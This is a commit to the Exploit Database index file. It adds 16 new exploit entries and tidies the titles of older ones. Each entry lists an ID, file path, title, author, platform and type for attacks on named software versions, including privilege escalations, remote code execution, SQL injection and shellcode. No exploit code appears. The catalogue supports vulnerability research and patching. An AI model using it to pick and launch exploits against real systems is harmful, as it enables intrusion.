DB: 2017-01-12

16 new exploits

VMware 2.5.1 - (VMware-authd) Remote Denial of Service
VMware 2.5.1 - 'VMware-authd' Remote Denial of Service
Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption
Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)
Boxoft Wav 1.0 - Buffer Overflow
VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow

EleCard MPEG PLAYER - '.m3u' Local Stack Overflow
Elecard MPEG Player - '.m3u' Local Stack Overflow

Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)
Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)

Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow
Boxoft WAV to MP3 Converter - 'convert' Buffer Overflow
Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)
Firejail - Privilege Escalation

McAfee Virus Scan Enterprise for Linux - Remote Code Execution
McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution

Ansible 2.1.4 / 2.2.1 - Command Execution

Eggblog < 3.07 - Remote SQL Injection / Privilege Escalation
EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation

PowerClan 1.14a - (footer.inc.php) Remote File Inclusion
PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion

Eggblog 3.1.0 - Cookies SQL Injection
EggBlog 3.1.0 - Cookies SQL Injection

eggBlog 4.0 - SQL Injection
EggBlog 4.0 - SQL Injection

2Capsule - 'sticker.php id' SQL Injection
2Capsule - SQL Injection

ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection
ASPThai.Net WebBoard 6.0 - SQL Injection
Memberkit 1.0 - Remote Arbitrary .PHP File Upload
phpScribe 0.9 - (user.cfg) Remote Config Disclosure
Memberkit 1.0 - Arbitrary File Upload
phpScribe 0.9 - 'user.cfg' Remote Config Disclosure

PowerClan 1.14a - (Authentication Bypass) SQL Injection
PowerClan 1.14a - Authentication Bypass

Webspell 4 - (Authentication Bypass) SQL Injection
webSPELL 4 - Authentication Bypass

eggBlog 4.1.1 - Local Directory Traversal
EggBlog 4.1.1 - Local Directory Traversal

Travel Portal Script Admin Password Change - Cross-Site Request Forgery
Travel Portal Script - Cross-Site Request Forgery (Admin Password Change)

eggBlog 4.1.2 - Arbitrary File Upload
EggBlog 4.1.2 - Arbitrary File Upload
Eggblog 2.0 - blog.php id Parameter SQL Injection
Eggblog 2.0 - topic.php message Parameter Cross-Site Scripting
EggBlog 2.0 - 'id' Parameter SQL Injection
EggBlog 2.0 - 'message' Parameter Cross-Site Scripting

PowerClan 1.14 - member.php SQL Injection
PowerClan 1.14 - 'member.php' SQL Injection
SoftBizScripts Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - products.php cid Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - 'index.php' cid Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - news_desc.php id Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - 'featured_photos.php' SQL Injection
SoftBizScripts Dating Script 1.0 - 'products.php' SQL Injection
SoftBizScripts Dating Script 1.0 - 'index.php' SQL Injection
SoftBizScripts Dating Script 1.0 - 'news_desc.php' SQL Injection

Dating Script 3.25 - SQL Injection

Starting Page 1.3 - SQL Injection
Starting Page 1.3 - 'linkid' Parameter SQL Injection
Starting Page 1.3 - 'category' Parameter SQL Injection
My link trader 1.1 - 'id' Parameter SQL Injection
Blackboard LMS 9.1 SP14 - Cross-Site Scripting
Huawei Flybox B660 - Cross-Site Request Forgery
Travel Portal Script 9.33 - SQL Injection
Movie Portal Script 7.35 - SQL Injection
Offensive Security 2017-01-12 05:01:16 +00:00
parent 1b13c8a790
commit 3617e005f6
20 changed files with 2675 additions and 30 deletions


@ -892,7 +892,7 @@ id,file,description,date,author,platform,type,port
7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)",2009-01-01,Houssamix,windows,dos,0 7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)",2009-01-01,Houssamix,windows,dos,0
7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)",2009-01-01,"aBo MoHaMeD",windows,dos,0 7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)",2009-01-01,"aBo MoHaMeD",windows,dos,0
7643,platforms/multiple/dos/7643.txt,"Konqueror 4.1 - Cross-Site Scripting / Remote Crash",2009-01-01,StAkeR,multiple,dos,0 7643,platforms/multiple/dos/7643.txt,"Konqueror 4.1 - Cross-Site Scripting / Remote Crash",2009-01-01,StAkeR,multiple,dos,0
7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - (VMware-authd) Remote Denial of Service",2009-01-02,"laurent gaffié",multiple,dos,0 7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - 'VMware-authd' Remote Denial of Service",2009-01-02,"laurent gaffié",multiple,dos,0
7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos,0 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos,0
7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0 7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0
7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0 7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0
@ -5335,6 +5335,10 @@ id,file,description,date,author,platform,type,port
40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0 40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0 40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0
40996,platforms/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos,0 40996,platforms/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos,0
41008,platforms/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption",2017-01-11,COSIG,multiple,dos,0
41012,platforms/multiple/dos/41012.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)",2017-01-11,COSIG,multiple,dos,0
41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5976,7 +5980,7 @@ id,file,description,date,author,platform,type,port
7839,platforms/windows/local/7839.py,"Total Video Player 1.31 - (DefaultSkin.ini) Local Stack Overflow",2009-01-20,His0k4,windows,local,0 7839,platforms/windows/local/7839.py,"Total Video Player 1.31 - (DefaultSkin.ini) Local Stack Overflow",2009-01-20,His0k4,windows,local,0
7843,platforms/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,windows,local,0 7843,platforms/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,windows,local,0
7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,windows,local,0 7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,windows,local,0
7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,windows,local,0 7853,platforms/windows/local/7853.pl,"Elecard MPEG Player - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,windows,local,0
7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (Universal)",2009-01-28,Houssamix,windows,local,0 7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (Universal)",2009-01-28,Houssamix,windows,local,0
@ -8220,7 +8224,7 @@ id,file,description,date,author,platform,type,port
33360,platforms/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0 33360,platforms/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0
33387,platforms/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0 33387,platforms/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0
33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0 33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0
40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)",2016-11-24,IOactive,windows,local,0 40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local,0
33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0 33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0
33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0 33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0 33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0
@ -8436,7 +8440,7 @@ id,file,description,date,author,platform,type,port
37975,platforms/linux/local/37975.py,"ZSNES 1.51 - Buffer Overflow",2015-08-26,"Juan Sacco",linux,local,0 37975,platforms/linux/local/37975.py,"ZSNES 1.51 - Buffer Overflow",2015-08-26,"Juan Sacco",linux,local,0
37987,platforms/linux/local/37987.py,"FENIX 0.92 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0 37987,platforms/linux/local/37987.py,"FENIX 0.92 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0 37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0 38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - 'convert' Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
38036,platforms/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Privilege Escalation (Metasploit)",2015-08-31,Metasploit,osx,local,0 38036,platforms/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Privilege Escalation (Metasploit)",2015-08-31,Metasploit,osx,local,0
38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0 38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OSX Client 2.0 - Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0 38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OSX Client 2.0 - Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
@ -8744,6 +8748,10 @@ id,file,description,date,author,platform,type,port
40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0 40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15196,7 +15204,7 @@ id,file,description,date,author,platform,type,port
40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0 40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0
40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0 40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0 40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0
40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0 40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0
40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0 40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0 40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0
@ -15205,6 +15213,7 @@ id,file,description,date,author,platform,type,port
40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0 40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0 40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0 41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
41013,platforms/linux/remote/41013.txt,"Ansible 2.1.4 / 2.2.1 - Command Execution",2017-01-09,Computest,linux,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16248,7 +16257,7 @@ id,file,description,date,author,platform,type,port
1839,platforms/php/webapps/1839.txt,"tinyBB 0.3 - Remote File Inclusion / SQL Injection",2006-05-28,nukedx,php,webapps,0 1839,platforms/php/webapps/1839.txt,"tinyBB 0.3 - Remote File Inclusion / SQL Injection",2006-05-28,nukedx,php,webapps,0
1840,platforms/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,asp,webapps,0 1840,platforms/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,asp,webapps,0
1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web 0.8x - Remote File Inclusion / Cross-Site Scripting",2006-05-28,nukedx,php,webapps,0 1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web 0.8x - Remote File Inclusion / Cross-Site Scripting",2006-05-28,nukedx,php,webapps,0
1842,platforms/php/webapps/1842.htm,"Eggblog < 3.07 - Remote SQL Injection / Privilege Escalation",2006-05-28,nukedx,php,webapps,0 1842,platforms/php/webapps/1842.htm,"EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation",2006-05-28,nukedx,php,webapps,0
1843,platforms/php/webapps/1843.txt,"UBB Threads 5.x / 6.x - Multiple Remote File Inclusion",2006-05-28,nukedx,php,webapps,0 1843,platforms/php/webapps/1843.txt,"UBB Threads 5.x / 6.x - Multiple Remote File Inclusion",2006-05-28,nukedx,php,webapps,0
1844,platforms/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - (phpBB Mod) File Inclusion",2006-05-28,nukedx,php,webapps,0 1844,platforms/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - (phpBB Mod) File Inclusion",2006-05-28,nukedx,php,webapps,0
1845,platforms/asp/webapps/1845.txt,"ASPSitem 2.0 - SQL Injection / Database Disclosure",2006-05-28,nukedx,asp,webapps,0 1845,platforms/asp/webapps/1845.txt,"ASPSitem 2.0 - SQL Injection / Database Disclosure",2006-05-28,nukedx,asp,webapps,0
@ -17076,7 +17085,7 @@ id,file,description,date,author,platform,type,port
2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0 2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0
2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0 2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0
2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - (footer.inc.php) Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0 2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0
2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - (inertianews_main.php) Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0 2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - (inertianews_main.php) Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0
2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0 2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0
@ -18257,7 +18266,7 @@ id,file,description,date,author,platform,type,port
4857,platforms/php/webapps/4857.txt,"OneCMS 2.4 - SQL Injection / Upload",2008-01-07,BugReport.IR,php,webapps,0 4857,platforms/php/webapps/4857.txt,"OneCMS 2.4 - SQL Injection / Upload",2008-01-07,BugReport.IR,php,webapps,0
4858,platforms/php/webapps/4858.pl,"FlexBB 0.6.3 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0 4858,platforms/php/webapps/4858.pl,"FlexBB 0.6.3 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Arbitrary File Upload / Authentication Bypass",2008-01-07,"Eugene Minaev",php,webapps,0 4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Arbitrary File Upload / Authentication Bypass",2008-01-07,"Eugene Minaev",php,webapps,0
4860,platforms/php/webapps/4860.pl,"Eggblog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0 4860,platforms/php/webapps/4860.pl,"EggBlog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - 'cmd.php' Remote Command Execution",2008-01-07,Houssamix,php,webapps,0 4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - 'cmd.php' Remote Command Execution",2008-01-07,Houssamix,php,webapps,0
4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0 4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0
4864,platforms/php/webapps/4864.txt,"ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 4864,platforms/php/webapps/4864.txt,"ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
@ -18590,7 +18599,7 @@ id,file,description,date,author,platform,type,port
5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion",2008-04-01,"Khashayar Fereidani",php,webapps,0 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion",2008-04-01,"Khashayar Fereidani",php,webapps,0
5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - 'show.php' SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - 'show.php' SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0
5335,platforms/php/webapps/5335.txt,"Mambo Component Ahsshop 1.51 - 'vara' Parameter SQL Injection",2008-04-01,S@BUN,php,webapps,0 5335,platforms/php/webapps/5335.txt,"Mambo Component Ahsshop 1.51 - 'vara' Parameter SQL Injection",2008-04-01,S@BUN,php,webapps,0
5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 - SQL Injection",2008-04-01,girex,php,webapps,0 5336,platforms/php/webapps/5336.pl,"EggBlog 4.0 - SQL Injection",2008-04-01,girex,php,webapps,0
5337,platforms/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' Parameter SQL Injection",2008-04-01,Stack,php,webapps,0 5337,platforms/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' Parameter SQL Injection",2008-04-01,Stack,php,webapps,0
